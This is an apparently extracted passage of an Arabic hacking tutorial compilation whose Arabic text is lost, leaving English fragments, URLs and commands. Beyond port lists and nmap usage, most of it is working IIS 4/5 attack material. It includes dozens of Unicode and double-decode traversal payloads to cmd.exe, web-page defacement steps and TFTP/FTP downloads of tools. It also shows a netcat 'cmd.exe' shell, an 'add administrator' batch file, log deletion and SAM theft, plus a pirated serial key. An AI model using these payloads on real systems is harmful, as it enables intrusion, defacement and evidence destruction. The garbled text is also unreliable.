Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail

.
: ... HTTPort .
.

TCP/IP HTTPort
( ) Proxy Server
ISP
) ) Proxy .
HTTPort
.
SOCKS
...

100

101

102

103

104

 ...
( Anonymous)
: ... 18
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (recieve mail), :
SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
!Messenger, and many more

http://www.analogx.com/files/proxyi.exe
PortBlocker :

:
PortBlocker is configured to block the most common types of servers
that might be on a system (FTP, HTTP, etc), so will not require any
modification for most users. If you are running a special server of some
sort, then you can easily add it's ports (either TCP or UDP) to it's list,
.and have them blocked and/or logged
Log unauthorized port access attempts and secure internal servers from
...internet access easily

105

 PortBlocker
http://www.analogx.com/files/pblocki.exe

.
...
...
...
Proxy Log Analyzer :
:

MB 1.07 :
http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/software/pla/pla.zip
.
Provides a space for you to type the address and port number of the
proxy server you want to use to gain access to the Internet over HTTP,
.Secure, FTP, Gopher, and Socks protocols

106

.
... .

107

" HTTP Port !!"

> <
>:<
:
-----------------------HTTPort 3snf
-----------------------:
-----------------------



,,,,,,,,,,,,
-----------------------
-----------------------http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
-----------------------:
------------------------
FAHAD

108


Port mapping

Add

New mapping

109


Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN

Proxy

,,,

110



Start

127.0.0.1
80

..

111

" " NeoTrace

><
>< DarK_HaCKeR :

..
..
..
..
Neo Trace Express
..
http://www.neoworx.com/download/NTX325.exe

112

113

 :
XDQG-2ZKN-X2PA-KTRQ

114

" "
> <
> :<
:
=) (=
^^^^^^^^^^^^^^^^^^^

/http://www.netcraft.com

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

/http://www.almodammer.com

dfl;kjgk'dgjbumpipt@almodammer.com
Headers

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners

..

Telnet Client
FTP 21

TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
Hyper Text Transfer Protocol
8080 - 80
80 Telnet
GET /qwe HTTP/1.1
400

:
HEAD 127.0.0.1 HTTP/1.1
...
^^^^^^^^^^^^^^^^^^^
115

=) (=
^^^^^^^^^^^^^^^^^^^
ping ip
!

ping ipsite
=ipsite

TTL=XXX
=XXX
:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255

: ) data list or packet ( Nodes TTL 1
tracert traceroute


tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

Windows



:
) N-Stealth ...(
=============
( Shadow Sceurity Scanner

116

(
=============
( SuperScan
( List
------------------------------------------------------------------------Linux

Nmap
( ) Network Maper
Linux
//
:
/ nmap
[l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
(Some Common Scan Types ('*' options require root privileges
((sS TCP SYN stealth port scan (default if privileged (root- *
(sT TCP connect() port scan (default for unprivileged userssU UDP port scan- *
(sP ping scan (Find any reachable machines(sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only- *
(sR/-I RPC/Identd scan (use with other scan types:(Some Common Options (none are required, most can be combined
O Use TCP/IP fingerprinting to guess remote operating system- *
'p ports to scan. Example range: '1-1024,1080,6666,31337F Only scans ports listed in nmap-services.v Verbose. Its use is recommended. Use twice for greater effectP0 Don't ping hosts (needed to scan http://www.microsoft.com/ and(others
Ddecoy_host1,decoy2[,...] Hide scan using many decoys- *
T General timing policyn/-R Never do DNS resolution/Always resolve [default: sometimes[resolve
oN/-oX/-oG Output normal/XML/grepable scan logs toiL Get targets from file; Use '-' for stdinS /-e Specify source address or network interface- *
(interactive Go into interactive mode (then press h for help-Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88'*.*.90
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
EXAMPLES
!!!!!!!!!
.. man page

nmap -sS -O -vv almodammer.com
= almodammer.com

.......
^^^^^^^^^^^^^^^^^^^
=(=(

117

^^^^^^^^^^^^^^^^^^^
Linux Shell Account
Linux Shell
Linux
whois
Linux

man whois
------------------------------------------------------------------ google
http://www.google.com/search?q=whois&btnG=Google+Search
cgi
netcraft ..............

118

" "
> <
>>P @ LH@CKERZ :

1
//:http
:
\
/http://www.XXX.com
/
2
3
4

119

 5
6
7
8
9
10
11
11 10 :

12

:
.

120

" ) ( "
><
><sNiper_hEx :
) 13 ( -:
.
.
.
.
. CMD
.

. ECHO
CMD
.
Access Denied . . FTP
.

. TFTP
.
-

121

 .

. NT4 / Win2k

IIS4.0 / IIS5.0

.
anonymous
person
.
.
-:

-1
.
.
-2
.
IIS4 / IIS5 CMD
.
. CMD
CMD

-:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx

: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx

:
http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.ex
e
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.e
\xe+c:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
: http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
:
122


:
http://www.xxxx.com/msadc/hEx.mdb

.
-:
\:http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c
-:
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

. ECHO

-:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c

-:

w3svc.exe

inetpub\scripts

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe

w3svc.exe
-:

inetpub\scripts

\:http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c


inetpub\wwwroot\index.htm -:
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co
m+>+c:\inetpub\wwwroot\index.htm

.
CMD
-:
CMD

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

CMD -:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c
Access Denied . Access Denied
Access Denied
-:
CMD CMD1
-1
Copy -:

123

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

ssinc.dll -:
-2
test.shtml
o
wwwroot/hEx/test.shtml
o
>! <--"include file="AAAA[...]AA#--
o
A 2049 .
http://www.xxxx.com/test.shtml
o
.
o
. Access Denied
o
500
o
.
NC.exe
-3
Temp Temp
.

-4
.
root.exe sensepost.exe shell.exe w3svc.exe :
-5
c:\inetpub\scripts .
-1

. FTP
CMD Scripts Shell.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe/

mspft.pll Echo open

-2
ftp.host.com . FTP
c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl/
Anonymous
-3
mspft.pll
shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl/
hExRay@Hotmail.Com
-4
mspft.pll
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/
User Anonymous mspft.pll
-5
shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl/

-6
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/

.g
shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl/
FTP FTP Get index.htm
-8

shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl/
Quit
-9
shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl/
-10 FTP.exe?+"-s:c:winnt\mspft.ppl
mspft.ppl -:
Open FTP.host.com Anonymous hEx@Hotmail.ComUser Anonymous -

124

hEx@Hotmail.Com

Get index.html

Quit

"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/
.
) ( Microsoft Access L0phtCrack
-:
_.SAM \
\winnt\repair L0phtCrack
-:

PASSFILT.DLL -:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL

ASP
MySQL ) ( htr.+

-:
http://www.xxxx.com/default.asp+.htr

database.inc
.

. TFTP
-1 index.htm \:c
-2 TFTP .

125

c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm/

tftp.exe

""i-

1.1.1.1

GET

index.htm

\\inetpub\wwwroot

index.htm

.
Log System32 -:
c+del+c:/winnt/system32/logfiles/*.log/

" ) ( "

126

> <

..
..
:
------------- )( cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe .. Echo
) CMD1.exe ( !
..
IWAM_USER Guest
. IIS
Guest !! (:
(: * nix Microsot
(: Administrator (:

..
(: ..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:

:
Sechole - 1 .. ) (
..
. (:
Tlist - 2 .. +
(:
Kill.exe -3 .
NCX99 -3 NC 99
TFTP32.exe -4 ..

127

 (: :

..
ncx99.exe :
http://target/scripts/..../winnt/system32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD = . Guest
.. TLIST .. PID
.. ..
PID ..
Kill .. KILL.exe PID : PID (:
! ..
Sechole .. ..
(: Sechole.exe .
IWAM_USER .. Administrators
. Access Denided
:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..

... (:
: IWAM_USER
: .. ! .
(: .. .
Administrator .
!! (: (:
:
net user Demon pass /add && net localgroup administrators Demon /add
Save as . add.bat
: Demon Pass
(: ..
add.bat ) (
(: .. (:
(:
) !(
.
..

netstat -an ..
(:
90% (: 139

128

(:
(:
.. (: .
.. . GUI

..
GEtAdmin Sechole2 .. WINvnc

" "

129

<>
< :>

:
( 1
TFTPD ( 2
( 3
=================================================
=================================================
( 1
/http://www.devil2k.com
(( ))
\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/
msadc/../
%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
\:c+dir+c
msadc/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
msadc/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/
msadc/..%%35c../..%%35c../..%/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
msadc/..%%35%63../..%%35%63../..%/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
\:c+dir+c
MSADC/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35c..%%35c..%%35c..%/
\:%35cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35%63..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
MSADC/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c

130

vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
\:PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
PBServer/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
\:Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
Rpc/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%252f..%252f..%252f..%252f..%252f../
\:%252fwinnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%255c..%255c..%255c..%255c..%255c.._/
\:%255cwinnt/system32/cmd.exe?/c+dir+c
adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%1C..%C1%1C..%C1%1C../
\:%C1%1Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%9C..%C1%9C..%C1%9C../
\:%C1%9Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C0%AF..%C0%AF..%C0%AF../
\:%C0%AFwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/

131

\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
samples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
adsamples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
TFTPD ( 2
/http://iisbughelp.4t.com
( 3
( )
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
C:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+D
D:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+E
E:\

132

 ))
((
(1 msadc
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
IIS )) (( :
C:\Inetpub\wwwroot

D:\Inetpub\wwwroot

E:\Inetpub\wwwroot
C


msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
)
( wwwroot
wwwroot

index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm


index.htm ss.htm
c+dir c+ren
)) Dos Command
Prompt
:

133

msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm ss.htm
(:
A

!!!Hacked
index.htm
TFTP



TFTP )
(
\ C:
index.htm \C:
\ C:
C:\inetpub\wwwroot
)) (( TFTP

TFTP )) ((


:
tftp.exe -i XXX.XXX.XXX.XXX get index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX ((
index.htm
wwwroot



:
"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
(:
TFTP index.htm
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
)) (( (:
: EXE :

134

 EXE hunter.exe
:
index.htm \ C:
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe

msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe/

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s

tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s


)) ((
bat



)) (( system32
______________________________________________________________
__________________
:
tftp
)) (( system32
)) ((

IIS Secure IIS Eeye

)) (( %90
IIS
)) (( .

135

" " IIS

> <
>< DEMON :
-------- - :
-------- IIS ..
..
.
-------- - :
-------- IIS4.0 IIS5.0 )) 80
(( .
------------ - :
------------ CGI-Scanner -1 .. ) Whisker :
( www.wiretrip.net/rfp
-2 ) :
( /http://www.activestate.com
-3 ) ( .. IIS
#########################
#########################
#########################

###########
# Game Starts !#
###########
---------------136

- : IIS Hack.exe
--------------- eEye nc.exe
.. 80
cmde.exe . Administrator
NC.exe IIS Hack.exe . /http://www.technotronic.com
..
nc.exe ) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
:
/c:\>nc http://www.target.com eGG SheLL
: IIS4.0 )) (( .
do you want me to explain what to do next, hey common you must be
kidding
....hehe...
-----------------: MDAC = RDS
---------------- ) %40 ..
..
SYSTEM ..
..
c:\>nc -nw -w 2 http://www.host.com/ 80 :
GET /msadc/msadcs.dll HTTP :
application/x_varg : )) (( ..
www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
Hacker's Swiss knife Army
Nc.exe :
systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
)) ((
80 . Administrator
--------------------------------------: Codebrws.asp & Showcode.asp
------------------------------------- ASP IIS

137

 ..
)) asp.
(( .
)) (( :
_.http://www.victim.com/msadc/samples...nt/repair/sam
.. Expand it & Crack it ) LC3.0
24 ( .
-------------- : Null.htw
----------- .. ..
.. ASP
http://www.victim.com/null.htw?CiWe...HiliteType=full :
. Default.asp
---------------------- : webhits.dll & .htw
--------------------- http://www.victim.com/blabla.htw :
format of the QUERY_STRING is invalid :
. %90
:
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
XXXXX/XXXXX/XXXX/XXX.htw , :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
.. LC3
-----------------------------------------------]-: ASP Alternate Data Streams [::$DATA
----------------------------------------------- .. 1998 IIS3.0
.. IIS4.0
)) ((
Global.asa
http://www.victim.com/default.asp::
$DATA
------------------ : ASP dot bug
----------------- ..

138

 .. 1997
:
http://www.victim.com/sample.asp.
. IIS3.0
------------------------------------ : ISM.DLL Buffer Truncation
----------------------------------- ..
..
..
ISM.dll )( 20%
. Space
:
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
<=230 230 .. %20
.. IIS 4.0&5.0
,
ISM.dll ..
..
Rebot . Logout & Login
----------: htr.+
-------- . ASP
:
http://www.victim.com/global.asa+.htr
------------- : site.csc
----------- DNS DSN, UID and
.. PASS Database
http://www.victim.com/adsamples/config/site.csc :
.. .

139

" "UniCode
> <
><Dark Devil :
::
.



) .... (


)( Trust Me
::
:
====

Found On 15 May 2001 BY NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
:: )
( IUSR_machinename account
cgi
) DeCode (

::
<=== http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c
<==== /http://iisserver
* - /scripts/ )
( cgi
140

 ( executable directory
iis
:: iis executable directory
)
(
* <=== winnt/system32/cmd.exe cmd
) cmd ping
netstat .... traceroute (
* -
) (
argument
copy
argument /c c/

:: 2000 cmd ) (?/ cmd

,
::
Starts a new instance of the Windows 2000 command interpreter
[CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF
]][S] [/C | /K] string/
C Carries out the command specified by string and then terminates/
K Carries out the command specified by string but remains/
(S Modifies the treatment of string after /C or /K (see below /
Q Turns echo off/
(D Disable execution of AutoRun commands from registry (see below /
::
Starts a new instance of the Windows 2000 command interpreter
2000 cmd
. arguments
arguments c/ ::
Carries out the command specified by string and then terminates

:: argument
k/ ::
Carries out the command specified by string but remains
)
ping (
argument Q/ echo

arguments )
c/ ( k/ on off
cmd ) (
MCSE

141

 arguments c/
.
, cmd.exe

::
Ping.exe+PRINT cmd.exe?/c
). ( enjoy this ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* - +c/ c/ argument cmd.exe
cmd + c/
+
.
** )
( decode
simplyfiey
::
%255c..%255c../ ..../


iis check
iis
check
iis check
check

( slash) /
::
computer logic HexaDecimal
Values values
/ hex value ::
20% : )(space
hex values
, hex values

decode
( slash) /
::
hex value , 5c% = /
/ value

iis value

hexadecimal values ::
%25 = %

142

%35 = 5
c = %63
iis checker
/ .

simplify

::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
c = %5c = %63 5 = %35 % = % %%35%63
c = %5c = %63 5 = %35 % = %25 %25%35%63
/= 5c% :

5c% / = 5c% iis
. checker

::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
s/+




) MCSE
( 2000
.WIN2000 RESOURCE KIT

143

" "
> : <
..


.....
******************
...

.....
2000 .
IIS :
*1 .
*2 .
*3 " ".
*4 .IIS
..
:
wwwroot Inetpub
IIS
/http://127.0.01

/http://127.0.0.1
.

144

" "
> <
>:

<De\/iL Ni9hT

= =-,,,
)),,,,((

=-

=-
.. =-
=-
=-

= =


)) ((

-1
)) ((

145

-2
/http://www.name.8m.com
FreeServerS
))....8m.s5

)) (( ))
((


))
((

=-

IE 5 IE 5.5

)) "
"((


,,,,
keykey2000


http://www.mikkotech.com/kk2000pro.exe

SN: K100-43-109-0-793218E876A4C9-29

godwill 5 ))5.5
((
http://www.thecorpz.org/activex/gwpackage.zip

146

=========================================

enter
Upx )) ((
Html

General options
enter exe file ))
((
enter html use default
page
HTA File Name Done
)) ((

http://www.thecorpz.org/html/activesploits.html
=================== ====================

)) ,,((
.

147

" "
> <
>:

<Linux Girl

) ( cookies
..
...
:
-1 .
-2 .
-3 .
-4 : .



.



.

IP .
Log Files .


.

.
" "
.
148

 .


.
: ...

: :
setcookie :
:code
boolean setcookie ( string name [, string value [, int expire
]([[[[[string path [, string domain [, int secure ,

:
: name ...
.
: value ... ... ...
... : serialize
unserialize .
: expire ) 1 ( 1970
... :
<- : .
<- : .
<- : . :
:code
>?
;(setcookie('site','http://www.palhackerz.com/',time()+3600
?<
time )
149

 1 . (1970
:

:
:code
>?
;(setcookie('site','',time()-360000
?<
:
-1 .
-2 .
:
setcookie .. :
:code
><html
><body
>?
;(setcookie('site','palhackerz.com',time()+20000
;"echo " Alfjr.com : the best islamic forum
?<
><body/
><html/

?< ... setcookie

:
:code
>? ;(setcookie('site','palhackerz.com',time()+20000
?<
><html

150

><body
>? <? ;"echo " palhackerz.com : the best Hacking forum
><body/
><html/

: ..

PHP ...
$_COOKIE Associative Arrays
.
:
:code
>?
;['echo $_COOKIE['site
?<
:
:code
palhackerz.com
:
..
-1 : user.php :
<- : . <- : -2 index.php . user.php
:
-1 : user.php
:code
>?
-----------------------*/

151

..Cookies-Based Background Selector

<Created By : "Rasha"<rasha@h4palestine.com
For : h4palestine.com
/*-------------------------

}()function display_form
<?
<html>
<body>
<-- Color setting Form --!>
<"form name=color_select method="GET>
<"INPUT type="hidden" name="do" value="set_color>
"=INPUT name="color" type="text" value>
<"<? ;()echo get_color ?>
<"=" INPUT type="submit" value>
<FORM/>
<-- Color Clearing Form --!>
<"form name=color_clear method="GET>
<"INPUT type="hidden" name="do" value="clear_color>
<"=" INPUT type="submit" value>
<FORM/>
?>

152

}()function set_color
;global $_GET
